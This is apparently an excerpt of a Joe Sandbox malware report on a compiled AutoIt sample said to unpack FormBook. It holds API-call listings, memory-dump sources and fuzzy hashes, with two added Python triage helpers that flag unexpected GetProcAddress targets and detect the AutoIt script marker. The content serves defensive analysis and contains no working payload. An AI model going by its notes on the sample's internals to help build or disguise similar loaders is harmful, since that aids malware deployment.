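The entry above (GetModuleHandleW on KERNEL32.DLL, then GetProcAddress for FlsAlloc, FlsGetValue, FlsSetValue and FlsFree, falling back to TlsAlloc) is the MSVC static CRT's thread-local-storage initializer, which resolves the Fls* family by name because those exports do not exist on older kernel32 builds. It is compiler boilerplate, not the sample's own dynamic API resolution, and an analyst reading a report like this one wants the two separated automatically. The following triage helper is an added example, not Joe Sandbox code and not the sample's code: it parses the "APIs" and "String ID" lines in the format these entries use, collects the names each function passes to GetProcAddress, marks the known CRT set as boilerplate, and flags the >>>AUTOIT SCRIPT<<< marker string used by AutoIt-compiled executables. The sample listing embedded in the block is constructed from the lines of this entry, plus one constructed negative case (a GetProcAddress of VirtualProtect that is not from this report) so that the "unexpected" path is exercised.

```python
"""Triage helper for Joe Sandbox per-function API listings.

Added example, not Joe Sandbox code. Parses the "APIs" / "String ID" lines
in the format used by the entries on this page, collects the names that
GetProcAddress resolves, and separates MSVC CRT thread-init boilerplate
from resolutions that deserve a closer look.
"""
import re
from dataclasses import dataclass, field

# The MSVC static CRT's thread-init routine resolves the Fls* family by name
# (absent from pre-Vista kernel32) and falls back to TlsAlloc. Exactly this
# set via GetProcAddress is compiler boilerplate, not attacker API resolution.
CRT_FLS_SET = {"FlsAlloc", "FlsGetValue", "FlsSetValue", "FlsFree"}
# Marker string embedded in AutoIt-compiled executables.
AUTOIT_MARKER = ">>>AUTOIT SCRIPT<<<"

# "• Func.MODULE(arg,arg), ref: ADDR", optionally nested under a subcall note.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[\w@?]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]+)\s*$"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")
ENTRY_END = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")
# Joe Sandbox prints numeric arguments as 8 hex digits and unknowns as "?";
# neither is a symbol name worth reporting.
HEX_OR_UNKNOWN = re.compile(r"^(?:[0-9A-Fa-f]{8}|\?)$")

# Constructed sample: the CRT-init entry from this report, a second entry
# carrying the AutoIt marker string, and a constructed negative case.
SAMPLE_LISTING = """\
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• __mtterm.LIBCMT ref: 00417C34
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
• GetCurrentThreadId.KERNEL32 ref: 00417D80
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
• Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
• String ID: >>>AUTOIT SCRIPT<<<$\\
• Instruction Fuzzy Hash: (constructed placeholder)
• GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 00401234
• String ID:
"""


@dataclass
class Entry:
    calls: list = field(default_factory=list)    # (func, module, [args], addr)
    strings: list = field(default_factory=list)  # values from the String ID line

    @property
    def resolved(self):
        """Names passed as the second argument to GetProcAddress, in order."""
        names = []
        for func, _mod, args, _addr in self.calls:
            if (func == "GetProcAddress" and len(args) >= 2
                    and not HEX_OR_UNKNOWN.match(args[1])):
                names.append(args[1])
        return names


def parse_listing(text):
    """Split report text into entries; an entry ends at its Instruction Fuzzy Hash."""
    entries, cur = [], Entry()
    for line in text.splitlines():
        if ENTRY_END.match(line):
            entries.append(cur)
            cur = Entry()
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append((m["func"], m["mod"], args, m["addr"]))
            continue
        m = STRING_LINE.match(line)
        if m:
            cur.strings.extend(s for s in m["ids"].split("$") if s)
    if cur.calls or cur.strings:  # trailing entry with no terminator (cut-off page)
        entries.append(cur)
    return entries


def triage(entry):
    """Classify one entry's GetProcAddress targets and look for the AutoIt marker."""
    resolved = set(entry.resolved)
    return {
        "resolved": entry.resolved,
        "crt_boilerplate": bool(resolved) and resolved <= CRT_FLS_SET,
        "unexpected_resolutions": sorted(resolved - CRT_FLS_SET),
        "autoit_marker": AUTOIT_MARKER in entry.strings,
    }


if __name__ == "__main__":
    for i, e in enumerate(parse_listing(SAMPLE_LISTING)):
        print(i, triage(e))
```

Run against a full exported report, the helper reduces several hundred entries to the handful whose GetProcAddress targets fall outside the CRT set; those are the ones to read by hand, since that is where real attacker-side resolution of injection or syscall primitives would show up.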

Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID: >>>AUTOIT SCRIPT<<<$\
• API String ID: 0-1896584978
• Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
• Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
• Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
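The function above references the string >>>AUTOIT SCRIPT<<<, which is the marker the AutoIt3 run-time stub uses to locate the compiled script embedded in the executable; its presence means the sample is a compiled AutoIt binary and that the FormBook payload is being unpacked by an AutoIt script rather than by hand-written native code. The triage helper below is an added example, not code from the Joe Sandbox report or from the AutoIt project: it scans a file for that marker in both UTF-16LE (the encoding the stub normally uses; treated here as an assumption) and plain ASCII, and returns the hashes a practitioner would use to correlate the file with the report's MD5/SHA256. The sample buffers in the block are constructed for the demonstration, not bytes from the real sample.

```python
from __future__ import annotations

import hashlib

# Marker string the AutoIt3 stub uses to delimit the embedded compiled script.
# The report lists it as a string referenced by the function above. It normally
# appears as UTF-16LE; ASCII is checked as well as a defensive assumption.
AUTOIT_MARKER = ">>>AUTOIT SCRIPT<<<"
ENCODINGS = {
    "utf-16le": AUTOIT_MARKER.encode("utf-16le"),
    "ascii": AUTOIT_MARKER.encode("ascii"),
}


def find_autoit_marker(data: bytes) -> list[dict]:
    """Return every occurrence of the marker as {encoding, offset, length}, ordered by offset."""
    hits: list[dict] = []
    for enc, needle in ENCODINGS.items():
        start = 0
        while True:
            idx = data.find(needle, start)
            if idx < 0:
                break
            hits.append({"encoding": enc, "offset": idx, "length": len(needle)})
            start = idx + 1  # keep scanning past this hit
    hits.sort(key=lambda h: h["offset"])
    return hits


def triage(data: bytes) -> dict:
    """Summarise a file: hashes for correlating with the sandbox report, plus marker hits.

    A marker hit means "compiled AutoIt", not "malicious" by itself; legitimate
    AutoIt applications carry the same marker. It tells you which unpacking
    tooling to reach for next.
    """
    hits = find_autoit_marker(data)
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "is_pe": data[:2] == b"MZ",          # cheap DOS-header check, not a full PE parse
        "autoit_marker_hits": hits,
        "likely_compiled_autoit": bool(hits),
    }


def triage_file(path: str) -> dict:
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as fh:
        return triage(fh.read())


if __name__ == "__main__":
    # Constructed sample: a fake "PE" prefix, padding, then the marker as UTF-16LE.
    constructed = b"MZ" + b"\x00" * 64 + AUTOIT_MARKER.encode("utf-16le") + b"\x01\x02"
    result = triage(constructed)
    print("sha256:", result["sha256"])
    print("compiled AutoIt:", result["likely_compiled_autoit"])
    for hit in result["autoit_marker_hits"]:
        print(f"  marker ({hit['encoding']}) at offset {hit['offset']:#x}")
```

Run it against the original sample file and compare the printed SHA256 with the one at the top of the report before trusting any conclusion; a hit at a non-zero offset inside the image is also where you would point an AutoIt decompiler, since the compiled script data follows the marker.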

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __wcsicoll$IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2485277191-404129466
• Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
• Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
• Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
• Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD

APIs
• LoadIconW.USER32(?,00000063), ref: 0045464C
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
• SetWindowTextW.USER32(?,?), ref: 00454678
• GetDlgItem.USER32(?,000003EA), ref: 00454690
• SetWindowTextW.USER32(00000000,?), ref: 00454697
• GetDlgItem.USER32(?,000003E9), ref: 004546A8
• SetWindowTextW.USER32(00000000,?), ref: 004546AF
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
• GetWindowRect.USER32(?,?), ref: 004546F5
• SetWindowTextW.USER32(?,?), ref: 00454765
• GetDesktopWindow.USER32 ref: 0045476F
• GetWindowRect.USER32(00000000), ref: 00454776
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
• GetClientRect.USER32(?,?), ref: 004547D2
• PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
• SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
• Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
• Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
• Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54

APIs
• _wcslen.LIBCMT ref: 00464B28
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
• _wcslen.LIBCMT ref: 00464C28
• GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
• _wcslen.LIBCMT ref: 00464CBA
• _wcslen.LIBCMT ref: 00464CD0
• _wcslen.LIBCMT ref: 00464CEF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcslen$Directory$CurrentSystem
• String ID: D
• API String ID: 1914653954-2746444292
• Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
• Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
• Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
• Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A

APIs
• _wcsncpy.LIBCMT ref: 0045CE39
• __wsplitpath.LIBCMT ref: 0045CE78
• _wcscat.LIBCMT ref: 0045CE8B
• _wcscat.LIBCMT ref: 0045CE9E
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
• _wcscpy.LIBCMT ref: 0045CF61
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                • API String ID: 1153243558-438819550
                                                                                                                                                                                                                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicoll
                                                                                                                                                                                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                                                                • API String ID: 3832890014-4202584635
                                                                                                                                                                                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                                                                                                • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 1534620443-4108050209
                                                                                                                                                                                                                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                                                                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CreateDestroy
                                                                                                                                                                                                                • String ID: ,$tooltips_class32
                                                                                                                                                                                                                • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                                                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                                                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 1441871840-4108050209
• Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
• Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
• Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
• Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 3631882475-2268648507
